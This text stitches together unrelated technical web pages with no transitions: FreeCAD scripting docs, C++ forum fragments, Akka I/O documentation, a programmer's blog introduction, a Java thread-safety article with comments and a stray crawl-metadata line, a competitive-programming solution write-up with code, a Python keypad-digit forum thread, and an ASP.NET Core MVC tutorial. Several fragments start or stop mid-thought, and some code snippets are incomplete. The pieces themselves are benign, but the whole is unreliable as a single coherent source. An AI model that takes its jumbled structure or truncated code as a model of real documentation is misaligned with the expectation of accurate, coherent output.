In the MVC design pattern, the Model component also contains the required logic to retrieve the data from a database. Once the model is created by the controller, the controller selects a view to render the domain data, i.e. the model data. While selecting a view, it is also the controller’s responsibility to pass the model data to it.
In the MVC design pattern, the only responsibility of the view is to render the model data. So, in MVC, the view is the component whose responsibility is to generate the necessary HTML to render the model data. Once the HTML is generated by the view, it is sent over the network to the client who initially made the request.
So, the three major components of an ASP.NET Core MVC Application are Model, View, and Controller. Let us discuss each of these components of the MVC design pattern in detail.
Model:
The Model is the component in the MVC Design pattern which is used to manage that data i.e. state of the application in memory. The Model represents a set of classes that are used to describe the application’s validation logic, business logic, and data access logic. So in our example, the model consists of Student class and the StudentBusinessLayer class.
public class Student
{
    public int StudentID { get; set; }
    public string Name { get; set; }
    public string Gender { get; set; }
    public string Branch { get; set; }
    public string Section { get; set; }
}

public class StudentBusinessLayer
{
    public IEnumerable<Student> GetAll()
    {
        //logic to return all students
    }

    public Student GetById(int StudentID)
    {
        //logic to return a student by StudentID
        Student student = new Student()
        {
            StudentID = StudentID,
            Name = "James",
            Gender = "Male",
            Branch = "CSE",
            Section = "A2",
        };
        return student;
    }

    public void Insert(Student student)
    {
        //logic to insert a student
    }

    public void Update(Student student)
    {
        //logic to update a student
    }

    public void Delete(int StudentID)
    {
        //logic to delete a student
    }
}
Here, in our example, we use the Student class to hold the student data in memory. The StudentBusinessLayer class is used to manage the student data i.e. going to perform the CRUD operation.
So, in short, we can say that a Model in MVC design pattern contains a set of classes that is used to represent the data and also contains the logic to manage those data. In our example, the Student class is the class that is used to represent the data. The StudentBusinessLayer class is the class that is used to manage the Student data.
View:
The view component in the MVC Design pattern is used to contain the logic to represent the model data as a user interface with which the end-user can interact. Basically, the view is used to render the domain data (i.e. business data) which is provided to it by the controller.
For example, we want to display Student data in a web page. In the following example, the Student model carried the student data to the view. As already discussed, the one and only responsibility of the view is to render that student data. The following code does the same thing.
@model ASPCoreApplication.Models.Student
<html>
<head>
    <title>Student Details</title>
</head>
<body>
    <br/>
    <br/>
    <table>
        <tr>
            <td>Student ID: </td>
            <td>@Model.StudentID</td>
        </tr>
        <tr>
            <td>Name: </td>
            <td>@Model.Name</td>
        </tr>
        <tr>
            <td>Gender: </td>
            <td>@Model.Gender</td>
        </tr>
        <tr>
            <td>Branch: </td>
            <td>@Model.Branch</td>
        </tr>
        <tr>
            <td>Section: </td>
            <td>@Model.Section</td>
        </tr>
    </table>
</body>
</html>
Controller:
A Controller is a .cs (for C# language) file which has some methods called Action Methods. When a request comes on the controller, it is the action method of the controller which will handle those requests.
The Controller is the component in an MVC application that handles the incoming HTTP request; based on the user action, the respective controller works with the model and the view and then sends the response back to the user who initially made the request. So, it is the one that interacts with both the models and the views to control the flow of application execution. In our example, the user issues a request for a student’s details.
Then that request is mapped to the Details action method of the Student Controller. How it gets mapped to the Details action method of the Student Controller is something we will discuss in our upcoming articles.
public class StudentController : Controller
{
    public ActionResult Details(int studentId)
    {
        StudentBusinessLayer studentBL = new StudentBusinessLayer();
        Student studentDetail = studentBL.GetById(studentId);
        return View(studentDetail);
    }
}
As you can see in the example, the Student Controller creates the Student object within the Details action method. So, here the Student is the Model. To fetch the Student data from the database, the controller uses the StudentBusinessLayer class.
Once the controller creates the Student model with the necessary student data, it passes that Student model to the Details view. The Details view then generates the necessary HTML to present the Student data. Once the HTML is generated, it is sent over the network to the client who initially made the request.
Note: In the MVC design pattern, both the Controller and the View depend on the Model, but the Model never depends on either the view or the controller. This is one of the main reasons for the separation of concerns, which allows us to build and test the model independently of the visual presentation.
Where MVC is used in the real-time three-layer application?
In general, a real-time application may consist of the following layers
- Presentation Layer: This layer is responsible for interacting with the user.
- Business Layer: This layer is responsible for implementing the core business logic of the application.
- Data Access Layer: This layer is responsible for interacting with the database to perform the CRUD operations.
The MVC design pattern is basically used to implement the Presentation Layer of the application. Please have a look at the following diagram.
What is ASP.NET Core MVC?
The ASP.NET Core MVC is a lightweight, open-source, highly testable presentation framework that is used for building web apps and Web APIs using the Model-View-Controller (MVC) design pattern. So, the point that you need to remember is, MVC is a design pattern and ASP.NET Core MVC is the framework that is based on MVC Design Pattern.
The ASP.NET Core MVC Framework provides us with a patterns-based way to develop dynamic websites and web apps with a clean separation of concerns. The framework gives us full control over the markup, supports Test-Driven Development, and uses the latest web standards.
In the next article, we are going to discuss how to set up the MVC middleware in asp.net core application. In this article, I try to give a brief introduction to ASP.NET Core MVC Framework. I would like to have your feedback. Please post your feedback, question, or comments about this ASP.NET Core MVC framework article.
5 thoughts on “Introduction to ASP.NET Core MVC Framework”
Please correct : Where MVC is used in real-time there layer application?
to
Where MVC is used in real-time three layer application?
Hi,
Thanks for identifying the typographical error. We have corrected it.
This is raviteja from hyderabad.I learned ASP.NET CORE MVC from this website.It is really really great tutorials that are very easy to understand and very informative.Please update the remaining concepts of ASP.NET CORE MVC.I am eagerly waiting for that.I will share this website to all my friends..
Thanks for the detailed explanation.I have learned all the .NET framework related concepts in your tutorial.
Now .NET team released .NET5. Can we use all these concepts in .NET 5 also? I am eagerly waiting for your reply.
Thanks for the detailed expanation | https://dotnettutorials.net/lesson/introduction-asp-net-core-mvc/ | CC-MAIN-2022-27 | refinedweb | 1,782 | 57.77 |
The objective of this post is to explain how to find mDNS services advertised in the LinkIt Smart using the ESP8266.
Introduction
The objective of this post is to explain how to find mDNS services advertised in the LinkIt Smart using the ESP8266.
Although we are creating a very simple use case, this will be an architecture that could be employed in real use case scenarios.
We assume the use of the ESP8266 libraries for the Arduino IDE. We also assume that the LinkIt Smart is already configured to connect to a WiFi network.
Creating the LinkIt Smart mDNS service
Setting the configuration file in the LinkIt Smart for the new service is pretty straightforward, and you can check a detailed explanation in this previous post.
The configuration file for this service will be very simple and is shown bellow. We just need to put it in the /etc/avahi/services directory so the Avahi daemon can advertise it. Name the file espserver.service and put it in the previously mentioned directory. The easiest way to do it is using the WinSCP tool.
<?xml version="1.0" standalone='no'?><!--*-nxml-*--> <!DOCTYPE service-group SYSTEM "avahi-service.dtd"> <service-group> <name replace-ESP8266 server</name> <service> <type>_espserver._tcp</type> <port>90</port> <txt-record>path=/</txt-record> </service> </service-group>
From the configuration file, we can easily see that our service will be called espserver and the transport protocol will be TCP. Also, the service will be available on port 90.
Naturally, we are just configuring the advertisement of a hypothetical service, since we will not implement it. So, it’s important to understand that we are not developing the actual service, just telling the other devices/applications in the network that there is a service available in the IP of the LinkIt Smart, on port 90, with the name espserver.
After uploading the configuration file, we just need to tell the avahi daemon to reload the service configuration files. To to do, just send the command bellow in the LinkIt Smart console.
avahi-daemon -r
The new mDNS service should now be visible to other applications. We can use, for example, the mDNS browser application for Google Chrome, which should list the new service, as seen in figure 1.
Figure 1 – The new LinkIt Smart service advertised on the network.
ESP8266 code
First of all, we will need to include two libraries, one for the functionality needed to connect the ESP8266 to a WiFi network and the other for the mDNS methods.
#include <ESP8266WiFi.h> #include <ESP8266mDNS.h>
We will do all our coding in the setup function. Since connecting to a WiFi network was already explained in this post, we will focus on the mDNS functionalities.
Most of the functionalities of the mDNS library are available through an extern variable called MDNS. This MDNS variable is an object of class MDNSResponder. Nevertheless, we don’t need to know the low level details since they are handled for us in an easy to use interface.
First, we start by calling the begin method on the MDNS object to setup the mDNS functionalities. This method receives as argument the name of the host, in this case, our ESP8266. We can call it whatever we want, as long as the name is smaller than 63 characters.
Since the begin method returns false when some initialization problem occurs, it’s a good practice to check the return value of the function.
if (!MDNS.begin("ESP")) { Serial.println("Error setting up mDNS"); }
After that, if no error occurs, we can send our mDNS query to check for the service we want. In this case, we will use the queryService method, also on the MDNS object. This method receives as first argument the name of the service and as second argument the primary transport protocol.
From our .service configuration file, we specified the name of the service as “espserver” and the primary transport protocol as “tcp“. Those are the arguments to be used.
It’s important to take in consideration that the output of this method is an integer, indicating the number of services that match the name and protocol and are found in the network.
int n = MDNS.queryService("espserver", "tcp");
Finally, we check if some service was found and we can get the host, IP and port of the LinkIt Smart service.
To find the hostname, we just call the hostname method on the MDNS object. To get the IP, we call the IP method. To get the port, we call the port method. You can check the source code of those methods here.
Since many services could have been found, the 3 methods mentioned before receive as argument the index of the service to which we want to retrieve the information. In this case, since we are operating in a controlled use case, we know that we only have a LinkIt Smart with this service, so we can use index zero. Nevertheless, in a real application scenario, we should iterate all the services to decide which host we want to connect to.
if (n == 0) { Serial.println("No service found"); } else { Serial.println("Service found"); Serial.println("Host: " + String(MDNS.hostname(0))); Serial.print("IP : " ); Serial.println(MDNS.IP(0)); Serial.println("Port: " + String(MDNS.port(0))); }
You can check the whole final code bellow, which also includes the connection to the WiFi network and the empty main loop function.
#include <ESP8266WiFi.h> #include <ESP8266mDNS.h> const char* ssid = "Your network"; const char* password = "Your network password"; void setup() { Serial.begin(115200); delay(100); Serial.println(); WiFi.begin(ssid, password); while (WiFi.status() != WL_CONNECTED) { delay(250); Serial.print("."); } Serial.println("Connection to AP established"); if (!MDNS.begin("ESP")) { Serial.println("Error setting up mDNS"); } Serial.println("mDNS setup finished"); Serial.println("Sending mDNS Query"); int n = MDNS.queryService("espserver", "tcp"); if (n == 0) { Serial.println("No service found"); } else { Serial.println("Service found"); Serial.println("Host: " + String(MDNS.hostname(0))); Serial.print("IP : " ); Serial.println(MDNS.IP(0)); Serial.println("Port: " + String(MDNS.port(0))); } } void loop() { }
Final result
After uploading the ESP8266 code, just open the serial monitor from the Arduino IDE and check the output. You should get something similar to figure 2.
Figure 2 – LinkIt Smart mDNS service information.
So, the host is “mylinkit”, which is the default host name configured in the LinkIt Smart for mDNS services.
The IP is the address of the LinkIt Smart on your WiFi network (which will most probably be different from mine).
Finally, the port is the one we specified in the .service configuration file.
Application use cases
Although all of the mDNS concept may seem a little complicated when we are working in a controlled environment where we can easily know the IPs of all the devices, in a real application IoT scenario we may not know the IPs that will be assigned to the deployed nodes.
So, mDNS offers a really useful solution to resolve names into IPs and to check the services available in a network without the need for a dedicated and centralized infra-structure.
If we think in a commercial application where the LinkIt Smart works as a gateway and there are many nodes implemented with ESP8266 devices, we want the user to be able to just connect the nodes and the nodes to automatically find the gateway.
With mDNS, this is easily done since all the ESP8266 can be programmed to look for a certain service name when they connect to a WiFi network. So, after they find it, they simply get the IP address of the gateway and the port where the gateway server is listening, and they can start communicating with it.
Related Posts
- LinkIt Smart Duo: Configuring mDNS services
- LinkIt Smart Duo: Connection to WiFi Network
- Linkit Smart Duo: Getting started
- ESP8266 Webserver: Resolving an address with mDNS
Related content
Technical details
- ESP8266 libraries: v2.3.0 | https://techtutorialsx.com/2016/12/04/esp8266-query-linkit-smart-mdns-services/ | CC-MAIN-2017-26 | refinedweb | 1,325 | 55.34 |
Object Construction and Destruction
Contents
- Local and Global Variables
- Reference Types
- Functions in C++
- Basic Input and Output
- Creating and Destroying Objects - Constructors and Destructors
1. Local and Global Variables
(Ref. Lippman 8.1-8.3)
Local variables are objects that are only accessible within a single function (or a sub-block within a function.) Global variables, on the other hand, are objects that are generally accessible to every function in a program. It is possible, though potentially confusing, for a local object and a global object to share the same name. In following example, the local object x shadows the object x in the global namespace. We must therefore use the global scope operator, ::, to access the global object.
main_file.C
float x; // A global object.
int main () {
float x; // A local object with the same name.
x = 5.0; // This refers to the local object.
::x = 7.0; // This refers to the global object.
}
What happens if we need to access the global object in another file? The object has already been defined in main_file.C, so we should not set aside new memory for it. We can inform the compiler of the existence of the global object using the extern keyword.
another_file.C
extern float x; // Declares the existence of a global object external to this file.
void do_something() {
x = 3; // Refers to the global object defined in main_file.C.
}
2. Reference Types
(Ref. Lippman 3.6)
Reference types are a convenient);
}
3. Functions in C++
Argument Passing
(Ref. Lippman 7.3)
Arguments can be passed to functions in two ways. These techniques are known as
Pass by value.
Pass by reference.
When an argument is passed by value, the function gets its own local copy of the object that was passed in. On the other hand, when an argument is passed by reference, the function simply refers to the object in the calling program.
// Pass by value.
void increment (int i) {
i++; // Modifies a local variable.
}
// Pass by reference.
void decrement (int& i) {
i--; // Modifies storage in the calling function.
}
#include <stdio.h>
int main () {
int k = 0;
increment(k); // This has no effect on k.
decrement(k); // This will modify k.
printf("%d\n", k);
}
Passing a large object by reference can improve efficiency since it avoids the overhead of creating an extra copy. However, it is important to understand the potentially undesirable side effects that can occur. If we want to protect against modifying objects in the calling program, we can pass the argument as a constant reference:
// Pass by reference.
void decrement (const int& i) {
i--; // This statement is now illegal.
}
Return by Reference
(Ref. Lippman 7.4)
A function may return a reference to an object, as long as the object is not local to the function. We may decide to return an object by reference for efficiency reasons (to avoid creating an extra copy). Returning by reference also allows us to have function calls that appear on the left hand side of an assignment statement. In the following contrived example, select_month() is used to pick out the month member of the object today and set its value to 9.
struct date {
int day;
int month;
int year;
};
int& select_month(struct date &d) {
return d.month;
}
#include <stdio.h>
int main() {
struct date today;
select_month(today) = 9; // This is equivalent to: today.month = 9;
printf("%d\n", today.month);
}
Default Arguments
(Ref. Lippman 7.3.5)
C++ allows us to specify default values for function arguments. Arguments with default values must all appear at the end of the argument list. In the following example, the third argument of move() has a default value of zero.
void move(int dx, int dy, int dz = 0) {
// Move some object in 3D space. If dz = 0, then move the object in 2D space.
}
int main() {
move(2, 3, 5);
move(2, 3); // dz assumes the default value, 0.
}
Function Overloading
(Ref. Lippman 9.1)
In C++, two functions can share the same name as long as their signatures are different. The signature of a function is another name for its parameter list. Function overloading is useful when two or more functionally similar tasks need to be implemented in different ways. For example:
void draw(double center, double radius) {
// Draw a circle.
}
void draw(int left, int top, int right, int bottom) {
// Draw a rectangle.
}
int main() {
draw(0, 5); // This will draw a circle.
draw(0, 4, 6, 8); // This will draw a rectangle.
}
Inline Functions
(Ref. Lippman 3.15, 7.6)
Every function call involves some overhead. If a small function has to be called a large number of times, the relative overhead can be high. In such instances, it makes sense to ask the compiler to expand the function inline. In the following example, we have used the inline keyword to make swap() an inline function.
inline void swap(int& a, int& b) {
int tmp = a;
a = b;
b = tmp;
}
#include <stdio.h>
main() {
int i = 2, j = 3;
swap(i, j);
printf("i = %d j = %d\n", i, j);
}
This code will be expanded as
main() {
int i = 2, j = 3;
int tmp = i;
i = j;
j = tmp;
printf("i = %d j = %d\n", i, j);
}
Whenever the compiler needs to expand a call to an inline function, it needs to know the function definition. For this reason, inline functions are usually placed in a header file that can be included where necessary. Note that the inline specification is only a recommendation to the compiler, which the compiler may choose to ignore. For example, a recursive function cannot be completely expanded inline.
4. Basic Input and Output
(Ref. Lippman 1.5)
C++ provides three predefined objects for basic input and output operations: cin, cout and cerr. All three objects can be accessed by including the header file iostream.h.
Reading from Standard Input: cin
cin is an object of type istream that allows us to read in a stream of data from standard input. It is functionally equivalent to the scanf() function in C. The following example shows how cin is used in conjunction with the >> operator. Note that the >> points towards the object into which we are reading data.
#include <iostream.h> // Provides access to cin and cout.
#include <stdio.h> /* Provides access to printf and scanf. */
int main() {
int i;
cin >> i; // Uses the stream input object, cin, to read data into i.
scanf("%d", &i); /* Equivalent C-style statement. */
float a;
cin >> i >> a; // Reads multiple values from standard input.
scanf("%d%f", &i, &a); /* Equivalent C-style statement. */
}
Writing to Standard Output: cout
cout is an object of type ostream that allows us to write out a stream of data to standard output. It is functionally equivalent to the printf() function in C. The following example shows how cout is used in conjunction with the << operator. Note that the << points away from the object from which we are writing out data.
#include <iostream.h> // Provides access to cin and cout.
#include <stdio.h> /* Provides access to printf and scanf. */
int main() {
cout << "Hello World!\n"; // Uses the stream output object, cout, to print out a string.
printf("Hello World!\n"); /* Equivalent C-style statement. */
int i = 7;
cout << "i = " << i << endl; // Sends multiple objects to standard output.
printf("i = %d\n", i); /* Equivalent C-style statement. */
}
Writing to Standard Error: cerr
cerr is also an object of type ostream. It is provided for the purpose of writing out warning and error messages to standard error. The usage of cerr is identical to that of cout. Why then should we bother with cerr? The reason is that it makes it easier to filter out warning and error messages from real data. For example, suppose that we compile the following program into an executable named foo:
#include <iostream.h>
int main() {
int i = 7;
cout << i << endl; // This is real data.
cerr << "A warning message" << endl; // This is a warning.
}
We could separate the data from the warning by redirecting the standard output to a file, while allowing the standard error to be printed on our console.
athena% foo > temp
A warning message
athena% cat temp
7
5..
point.h
// Declaration of class Point.
#ifndef _POINT_H_
#define _POINT_H_
#include <iostream.h>
class Point {
// The state of a Point object. Property variables are typically
// set up as private data members, which are read from and
// written to via public access methods.
private:
float mfX;
float mfY;
//"
void main() {
Point a;
Point b(1.0, 2.0);
Point c(b);
// Print out the current state of all objects.
a.print();
b.print();
c.print();
b.set_x(3.0);
b.set_y(4.0);
// Print out the current state of b.
cout << endl;
b.print();
} | http://ocw.mit.edu/courses/civil-and-environmental-engineering/1-124j-foundations-of-software-engineering-fall-2000/lecture-notes/object-_construction_and_destruction/ | crawl-003 | refinedweb | 1,461 | 67.35 |
Configuration macros for platform, compiler, etc. More...
Configuration macros for platform, compiler, etc.
#include <mi/base/base.h>
The operating system specific default filename extension for shared libraries (DLLs)
Creates an identifier from concatenating the values of
X and
Y, possibly expanding macros in
X and
Y.
Creates a string from the value of
X, possibly expanding macros in
X.
This macro is defined if the compiler supports rvalue references.
The compiler-specific, strong
inline keyword.
The C++ language keyword
inline is a recommendation to the compiler. Whether an inline function is actually inlined or not depends on the optimizer. In some cases, the developer knows better than the optimizer. This is why many compilers offer a separate, stronger inline statement. This define gives portable access to the compiler-specific keyword.
Pre-define
MI_FORCE_INLINE to override the setting in this file.
Empty macro that can be used after function names to prevent macro expansion that happen to have the same name, for example,
min or
max functions. | https://raytracing-docs.nvidia.com/iray/api_reference/iray/html/group__mi__base__config.html | CC-MAIN-2019-22 | refinedweb | 167 | 50.43 |
Revision as of 21:00, 22 August 2017
Contents
DRAFT
Review Purpose
In order for a new Module to be added to Fedora, the module must first undertake a formal review much like the RPM Package Review process. The purpose of this formal review is to try to ensure that the module meets the quality control requirements for Fedora.
Reviews are currently done for totally new modules and every time a new module stream is created (technically, proposed to be created).
Modules are not required to share a 1:1 relationship with RPM Packages but can instead deliver multiple RPM Packages (such as dependencies) in order to distribute a fully functional module. However naming of the module should be based on the main service or software it aims to deliver.
Testing Modules
For both contributors and reviewers, the COPR infrastructure can and should be used for creating and testing modules in advance of building them formally. For any long-standing Fedora Packager, this is taking the place of "Koji scratch builds" for Modules. Why? Because modules are much trickier to track through Koji and scratch builds in Koji & MBS will be a challenging implementation. As a result, it has been deferred, perhaps indefinitely, if COPR can fill the role as well or better.
NOTE: The COPR infrastructure has not deployed the changes required for creating and building modules yet. Currently, blocked on some of the base modules being built. For now, please use
mbs-build local as described in the docs
Review Process
There are two roles in the review process, that of the contributor and that of the reviewer. In this document, we'll present both perspectives.
Contributor
A Contributor is defined as someone who wants to submit (and maintain) a new Module in Fedora. To become a contributor, you must follow the detailed instructions to Join the package collection maintainers.
As a Contributor, you must only be creating modules out of pre-existing software in the Fedora RPM repositories which adheres to the Package Naming Guidelines and Packaging Guidelines. Make note that the only software allowed in official Fedora Modules must be sourced from Fedora official RPMs. The Module Build Service will reject attempts to build from sources not provided by Fedora's dist-git.
Module Metadata Files
- Put your Module Metadata (modulemd) file.
- Ensure your modulemd file meets the specifications outlined in the Module Guidelines
- Fill out a request for review in bugzilla (FIX ME). For guidance, a screenshot of a sample bugzilla request is available for review FIX ME.
- If you do not have any package, container layered image, or module modulemd file! At this point in the process, the fedora-review flag is blank, meaning that no reviewer is assigned.
- There may be comments from people that are not formally reviewing the module, they may add NotReady to the Whiteboard field, indication that the review request is not yet ready, because of some issues they report. After you have addressed them, please post the URLs to the updated modulemd file modulemd. You should fix any blockers that the reviewer identifies. Once the reviewer is happy with the package, the fedora-review flag will be set to +, indicating that the package has passed review.
- At this point, you need to make an SCM admin request for your newly approved Module! If you have not yet been sponsored, you will not be able to progress past this point. (You will need to make sure to request the
modulenamespace in PackageDB)
- Checkout the package using "fedpkg clone module/<module-name>" and do a final check of your files.
- When this is complete, you can add relevant module files into the SCM.
- Request a build by running "mbs-build submit" from the directory you cloned into.
- You should make sure the review ticket is closed. You are welcome to close it once the module has been built. If you close the ticket yourself, use NEXTRELEASE as the resolution.
You do not need to go through the review process again for subsequent module changes for this module stream..)
Module Metadata File
- Module Metadata (modulemd) file, set the fedora-review flag to ? and assign the bug to yourself.
- Review the module ...
- Go through the MUST items listed in Module Guidelines.
- Go through the SHOULD items in Module Guidelines.
- Include the text of your review in a comment in the ticket. For easy readability, simply use a regular comment instead of an attachment.
- Take one of the following actions:
- ACCEPT - If the module is good, set the fedora-review flag to +
- FAIL, LEGAL - If the module is legally risky for whatever reason (known patent or copyright infringement, trademark concerns) close the bug WONTFIX and leave an appropriate comment (e.g. linking to the corresponding entry on the Forbidden_items page). Set the fedora-review flag to -, and have the review ticket block FE-Legal.
- FAIL, OTHER - If the module is just way off or unsuitable for some other reason, and there is no simple fix, then close the bug WONTFIX and leave an appropriate comment (e.g. packaging and gift wrap are not the same thing, sorry. Or, this isn't a modulemd,. (Note: The Package nomenclature is carried over here and you will want to filter for "Module Review")
The "Trivial" status is intended to indicate Modules which, as an aid to new reviewers, are especially uncomplicated and easy to review. A ticket should not be marked as being trivial unless:
- The Module is known to build and a link to a COPR build is included.
- The ticket explains any yamllint output which is present.
- The Module contains no daemons.
- The Module is not especially security sensitive.
- The code has undergone a thorough inspection for licensing issues. Anomalies which would be found by licensecheck should be explained.
In short, this should be reserved only for those tickets which should be easily approachable by someone doing their first Module review.
Tracking of Module Requests
The cached Package Review Tracker provides various review-related reports and a simple way to search for reviews by package name or reporter name or others. (Note: The Package nomenclature is carried over here and you will want to filter for "Module Review") | https://www.fedoraproject.org/w/index.php?title=Module:Review_Process&diff=prev&oldid=500192 | CC-MAIN-2021-31 | refinedweb | 1,034 | 62.48 |
This.
Among other things, the new HTML designer provides:
Below is a screen-shot
Presumably Microsoft is shipping an ultra-high resolution monitor with each copy of Orcas then? You have a *lot* of panels open in that screenshot!
Good improvements though. This will encourage people to use the HTML view in tandem with the designer so that they can be more aware of what code changes their actions are making.
Great news Scott. I can't wait to start using this new editor.
One thing I keep waiting for is proper multi-monitor support in Visual Studio though. That split view could work incredibly well with two monitors if it was supported. Source view of the page on one screen and WYSIWYG view on the other. Are you aware if any work regarding multi-monitor support has taken place with Visual Studio?
A man can dream.... :)
That's great news :)
I only wish for full IntelliSense support...
Does Orcas finally provide IntelliSense in the databinding expressions?
The two features that would greatly help databinding to objects (LINQ objects or custom objects) in ASP.NET from a designer perspective are IntelliSense (no more of this generic Eval/Bind thing... let's have strong typing) and being able to traverse an object model in a binding expression (which is easier with IntelliSense and strongly typed items).
Essentially, rather than having to do ((MyType)Container.DataItem).MyProperty.SomethingElse -- or a sub-datasource as ((Order)Container.DataItem).Details -- the items should already be strongly typed. And with IntelliSense support, it's even easier.
--Oren
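A hypothetical sketch of the kind of strongly-typed binding being asked for here. Only the Eval form is real syntax today; the `Item` accessor in the second entry is an invented stand-in for whatever a strongly-typed designer would expose:

```aspx
<%-- Real, current syntax: late-bound, no IntelliSense, typos surface
     only at runtime --%>
<asp:Label runat="server" Text='<%# Eval("Customer.Name") %>' />

<%-- Hypothetical: "Item" is an assumed strongly-typed accessor (it does
     not exist in today's templates), so Customer.Name could be verified
     at compile time and completed by IntelliSense --%>
<asp:Label runat="server" Text='<%# Item.Customer.Name %>' />
```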
I suppose the new designer shares some code with the Expression Web Designer, am I right? I like EWD very much, and having it integrated into VS would be great!
Hi Scott ... great news !!!
Any idea when this new editor will be available (for beta testers) in any CTP or beta?
Thanks in advance
Bye from Spain
This is incredible. I am especially happy to see an integration between expression & VS. Now it'd be nice if SharePoint Designer did the same, but hey.
So this isn't a part of the Jan CTP right? This'll be a part of the next Orcas CTP.
I am super excited that Orcas is finally beginning to take shape.
SM
Scott,
This is great stuff, but is there anything being done to improve build speeds of ASP.NET projects? I realize that both aspx pages and code-behind are being built when using Web Site Projects in a "Full rebuild" scenario.
Still, VS 2005/7 should be smart enough to see files that have not been changed and try NOT to build them - if they have been built already. In addition, maybe, this should be extended to Web deployment projects too.
Yes, I have already read your tips on this ;-)
Thanks,
Raj
I heard the other day about a new update from a refactoring tool (I don't remember the name) that mentions new ASP.NET CSS-related refactorings -- simple, but they sound useful. Will Orcas have CSS or ASP.NET-related refactoring?
Thanks
I'm with Stebet on the multi-monitor support. It would be great if the Code and Design windows could be split from their usual stacked above/below configuration. For instance, with the code on one monitor and the design on another.
And just better multi-monitor support overall. It seems most developers now use at least two monitors.
It's nice to see the Web Expression style stuff in Orcas. I had a look at Expression and was suitably impressed. I may even give up Topstyle one of these days.
Marcos
Once these improvements are available in a final release, I'm going to have problems coming up with a reason to keep Dreamweaver around ;)
With all of the advancements, is there any possibility of seeing something like this in "Orcas"? The concept is to allow xmlns-style names for attributes on a control in the HTML view for extenders.
After working on the Ajax Control Toolkit for awhile we're producing a lot of extenders for use in ASP.NET development. Something like the above could make it easier to associate a control with its extended behavior.
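A sketch of the xmlns-style attribute idea. The separate-extender form is real AJAX Control Toolkit syntax; the namespace-qualified attribute form below it is invented purely to illustrate the suggestion:

```aspx
<%-- Today: the Toolkit extender is a separate control wired up by ID --%>
<asp:TextBox ID="SearchBox" runat="server" />
<ajaxToolkit:TextBoxWatermarkExtender runat="server"
    TargetControlID="SearchBox" WatermarkText="Search..." />

<%-- Suggested (hypothetical): an assumed namespace-qualified attribute
     that attaches the extender's behavior directly to the control --%>
<asp:TextBox ID="SearchBox2" runat="server"
    watermark:WatermarkText="Search..." />
```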
Wow! Split-view is a great feature! Adding the ability to detach either the HTML edit window or the designer window from the main window would be awesome for those in a multi-monitor environment!
I have a few questions:
1. I played with Expression Web today, and I was amazed (in a negative way) to see the JavaScript that it outputs for some 'dynamic' buttons. Also shocking was the use of comments in the source to add behavior to the designer. Please tell me we will not start seeing this in Visual Studio!
2. I have been using Firebug a lot, an add-on for Firefox. It allows me to alter the source for a web page with a real-time preview IN THE ACTUAL BROWSER. Nothing can beat that kind of preview, right? So is that how the new designer works?
Thanks!
WOW!!!! I can't wait to get my hands on that split screen mode.
I agree with Ron: having IntelliSense and XHTML validation support for properties implemented as child controls would fill in the last missing gap.
I recently stumbled into this when I posted about the issue in the asp.net Visual Studio forums. (I had not run into this issue until recently.)
Currently the only way to get validation and IntelliSense is to nest server controls instead of using child control properties.
I would like to develop my controls and use child control properties a la GridView.
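For context, a child control property is a property exposed as a nested element in markup, the way GridView exposes <Columns>. A sketch with an invented custom control (the `my:` prefix and control names are assumptions, not a real library):

```aspx
<%-- <Panes> below is a collection property rendered as a child element,
     not a server control; in the current editor its contents get no
     IntelliSense or XHTML validation. All names here are hypothetical. --%>
<my:TabStrip ID="Tabs" runat="server">
  <Panes>
    <my:TabPane Title="Overview" />
    <my:TabPane Title="Details" />
  </Panes>
</my:TabStrip>
```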
I would like to remind the team not to lose sight of the work being done on SharePoint Designer, Expression Web, and even Windows Live Writer. It would be a shame to see divergence on core bits such as the HTML editor and various tools that could be shared across the applications. Did you know that Windows Live Writer doesn't emit proper XHTML? It sounds crazy because we see so much advancement in web standards in other Microsoft tools (I know it's a free tool, but you're in the same eco-system where you should be able to access each other's developments). Keeping the core in sync will make for great collaboration when your web designers and developers share similar (but different enough to be tailored to their needs) environments.
>>Designer support for nested master pages
Thank You.
Michael
All of this sounds nice. Not taking anything away from the people who invested their passion nor from Microsoft who has invested the resources, but these design views are easily accommodated using Firefox and a few plug-ins, both commercial and free, a good style sheet editor and running the in-development process via localhost while using other assorted browsers/user agents simultaneously to check performance and rendering.
The improved Intellisense functionality sounds tremendous.
I hope to hell that 1% of identical resources have been invested into Orcas to produce true compliant control adapters and not advertised "pseudo" compliant control adapters, either internal or add-on. ASP.NET could be the best platform out there, now and years to come. That means meeting the basics out of the shoot -- tab order, shortcut keys, captions, true device independence, etc., -- with the flexibility for the developer/designer to utilize and assign such based upon the demographics of the project, e.g., being able to assign tab index and access key values directly into the database or XML file for the datagrid and menu adapters.
When this animal comes out of the shoot again, I hope to hell that it is the big mean ass bull that it is being promoted as being and not some old Jersey cow with a new shiny bell around her neck.
There are two things I'd like Orcas to improve concerning working with Skin files. First I’d like to have IntelliSense in skin files and second the possibility to have code blocks like with aspx files with data binding. Something like: <%# Eval("Name").ToString().Replace("red", "green") %>.
Thanks for another great post! I'm excited for this next phase of visual studio's evolution.
Awesome! Same engine as Expression, right, so it's not based on MSHTML and thus works faster? I've been using Expression for a while now and love it, except for its lack of decent ASP.NET support.
How about the JavaScript tools in the Orcas build?
I am glad you guys are working on a better CSS-oriented editor but I have to agree with earlier comments that this looks really cluttered and very unintuitive.
I use the Firebug extension to Firefox for all my editing now. Its ability to view the inheritance tree and tweak CSS settings in real time is better than anything else I have seen. I would love to see something like that in VS.
Hi Scott... That sounds awesome! Can't wait for you guys to release orcas! Hurry up! :)
Btw, are there any features "missing" in the new designer? I don't have any specific feature in mind, but is the new designer missing any features compared to the old one?
Keep up your awesome work!
Will AJAX be built in into Orcas?
Peace in Christ
Marco Napoli
Now that is just mean. ;) It is so hard to wait for features like this.
hi Scott,
The changes in the designer have been very good compared to earlier releases such as VS 2003. But there was a minor issue. While using the web site administration tool for editing web.config files, IntelliSense used to get disabled due to namespace addition. Has this problem been taken care of in this new release?
Regards,
Nilesh
For people who are talking about multiple monitor support, I use two monitors at work, with VS 2005. I have all my code (and only the code) in my left-hand monitor (oriented portrait, for more code-on-screen).
All my panels are undocked and on my right-hand monitor (still oriented landscape). So I get all the benefits of having the two monitors, without having toolbars and code split awkwardly across the join.
Worth trying. A photo of my screens (conveniently with Visual Studio having focus) is on Flickr, if that helps explain it any.
This is all good - I really didn't want to depend upon Expression to do my programming work after spending the $$$ on VS
It makes me wonder what you are working on right now, since you started this work in 2004!
orcas is the visual studio that I've sought after for years now! having started with dreamweaver I hated the lack of real design support in VS...
but it's 2007 and designer support is becoming more prevalent in your products. YIPEE!
